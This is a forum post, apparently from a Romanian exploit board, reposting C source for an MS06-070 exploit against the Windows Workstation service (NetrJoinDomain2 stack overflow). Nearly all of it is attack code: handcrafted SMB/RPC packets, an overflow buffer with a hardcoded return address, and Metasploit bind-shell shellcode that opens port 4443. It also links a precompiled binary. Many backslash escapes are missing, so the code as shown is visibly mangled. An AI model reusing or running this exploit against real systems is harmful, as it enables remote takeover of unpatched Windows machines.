Jump to content
Christian

MS Windows Wkssvc NetrJoinDomain2 Stack Overflow

By Christian, in Exploituri

Recommended Posts

Christian Newbie

Christian

Posted
Posted 

/***************************************************************************

Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:[url]http://ruder.cdut.net/default.asp[/url]

Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
correct jmp EBX address and fixed exploit output status.

Should work on Windows 2000 Server SP4 (All Languages)


usage:
ms06070 targetip DomainName

notice:
Make sure the DomainName is valid and live,more informations see
[url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url],
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
#pragma comment(lib, "wsock32.lib")


unsigned char SmbNeg[] =
"x00x00x00x2fxffx53x4dx42x72x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
"x20x4cx4dx20x30x2ex31x32x00";


unsigned char Session_Setup_AndX_Request[]=
"x00x00x00x48xffx53x4dx42x73x00"
"x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
"xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
"x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
"x62x00";


unsigned char TreeConnect_AndX_Request[]=
"x00x00x00x58xffx53x4dx42x75x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
"x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
"x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
"x3fx00";


unsigned char NTCreate_AndX_Request[]=
"x00x00x00x64xffx53x4dx42xa2x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
"x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
"x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
"x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";


unsigned char Rpc_Bind_Wkssvc[]=
"x00x00x00x92xffx53x4dx42x25x00"
"x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
"x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
"x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
"x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
"x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
"x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
"xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
"x9fxe8x08x00x2bx10x48x60x02x00x00x00";


unsigned char Rpc_NetrJoinDomain2_Header[]=
"x00x00x00xa8xffx53x4dx42x25x00"
"x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
"x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
"x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
"x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
"x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
"x00x00x00x00"
"x16x00"     //opnum,NetrJoinDomain2
"x30x2ax42x00"
"x0ex00x00x00"
"x00x00x00x00"
"x0ex00x00x00"
"x5cx00x5cx00x31x00x37x00x32x00"
"x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
"x00x00"
"x10x01x00x00"
"x00x00x00x00"
"x10x01x00x00";


unsigned char Rpc_NetrJoinDomain2_End[]=
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x01x00x00x00";


unsigned char *lpDomainName=NULL;
DWORD   dwDomainNameLen=0;



/* win32_bind -  EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9"
"x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31"
"x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45"
"xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57"
"x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6"
"x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25"
"xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
"xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e"
"x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e"
"x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc"
"xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d"
"xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f"
"x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6"
"x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
"xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99"
"x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e"
"xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3"
"x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31"
"x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f"
"x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e"
"x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
"xbaxa6xf5x31x39x59x23xce";


DWORD    fill_len_1 =0x84c;     //fill data
DWORD    fill_len_2 =0x1000;    //fill rubbish data
DWORD    addr_jmp_ebx=0x77F92A9B;   //jmp ebx address,in ntdll.dll
unsigned char  code_jmp8[]=      //jmp 8
"xEBx06x90x90";

unsigned char  *Rpc_NetrJoinDomain2=NULL;
DWORD    dwRpc_NetrJoinDomain2=0;


unsigned char  recvbuff[2048];


void showinfo(void)
{
 printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
 printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
 printf("page:http://ruder.cdut.net/default.aspnn");
 printf("Code fixed by S A Stevens - 16.11.2006n");
 printf("Should work on Windows 2000 Server SP4 (All Languages)nn");
 printf("usage:n");
 printf("ms06070 targetip DomainNamenn");
 printf("notice:n");
 printf("Make sure the DomainName is valid and live,more informations seen");
 printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
 printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");

}

void neg ( int s )
{
 char response[1024];

 memset(response,0,sizeof(response));

 send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}



void MakeAttackPacket(char *lpDomainNameStr)
{
 DWORD  j,len,b_flag;



 dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
 lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

 memset(lpDomainName,0,dwDomainNameLen);

MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

 *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
 *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

 len=dwDomainNameLen+     //DomainName
 fill_len_1-3*2+      //fill_len_1
 4+         //jmp 8
 4+         //addr jmp ebx
 sizeof(shellcode)-1+    //shellcode
 fill_len_2+       //fill_len_2
 2;         //0x0000

 b_flag=0;
 if (len%2==1)
 {
 len++;
 b_flag=1;
 }


 dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
       len+
       sizeof(Rpc_NetrJoinDomain2_End)-1; //end


 //malloc
 Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
 if (Rpc_NetrJoinDomain2==NULL)
 {
 printf("malloc error!n");
 return;
 }

 //fill nop
 memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //update para1 length
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
 *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


 //copy header

memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

 j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

 //copy DomainName
 memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
 j=j+dwDomainNameLen;

 //calculate offset
 j=j+fill_len_1-3*2;

 //jmp 8
 memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
 j=j+4;

 //jmp ebx address
 *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
 j=j+4;

 //copy shellcode
 memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
 j=j+sizeof(shellcode)-1;

 //fill data
 memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
 j=j+fill_len_2;

 //0x0000(NULL)
 if (b_flag==0)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 j=j+2;
 }
 else if (b_flag==1)
 {
 Rpc_NetrJoinDomain2[j]=0x00;
 Rpc_NetrJoinDomain2[j+1]=0x00;
 Rpc_NetrJoinDomain2[j+2]=0x00;
 j=j+3;
 }


 //copy other parameter

memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

 j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


}



void main(int argc,char **argv)
{
 WSADATA    ws;
 struct sockaddr_in server;
   SOCKET    sock;
 DWORD    ret;
 WORD    userid,treeid,fid;


 WSAStartup(MAKEWORD(2,2),&ws);




   sock = socket(AF_INET,SOCK_STREAM,0);
   if(sock<=0)
 {
       return;
 }

   server.sin_family = AF_INET;
   server.sin_addr.s_addr = inet_addr(argv[1]);
   server.sin_port = htons((USHORT)445);

 printf("[+] Connecting %sn",argv[1]);

   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
 if (ret==-1)
 {
 printf("Connection Error, Port 445 Firewalled?n");
 return;
 }


 neg(sock);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send Session_Setup_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 userid=*(WORD *)(recvbuff+0x20);       //get userid


 memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


 ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send TreeConnect_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

 treeid=*(WORD *)(recvbuff+0x1c);       //get treeid


 //send NTCreate_AndX_Request
 memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
 memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid


 ret=send(sock,(char
*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
 if (ret<=0)
 {
 printf("send NTCreate_AndX_Request error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 fid=*(WORD *)(recvbuff+0x2a);        //get fid


 //rpc bind

 memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
 memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
 memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

 ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
 if (ret<=0)
 {
 printf("send Rpc_Bind_Wkssvc error!n");
 return;
 }
 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


 MakeAttackPacket((char *)argv[2]);


 memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
 memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
 memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
 *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

 *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
 *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length

 ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
 if (ret<=0)
 {
 printf("send Rpc_NetrJoinDomain2 error!n");
 return;
 }

 printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]);

 recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




 closesocket(sock);

}

// milw0rm.com [2006-11-17]

and the compiled version:

http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...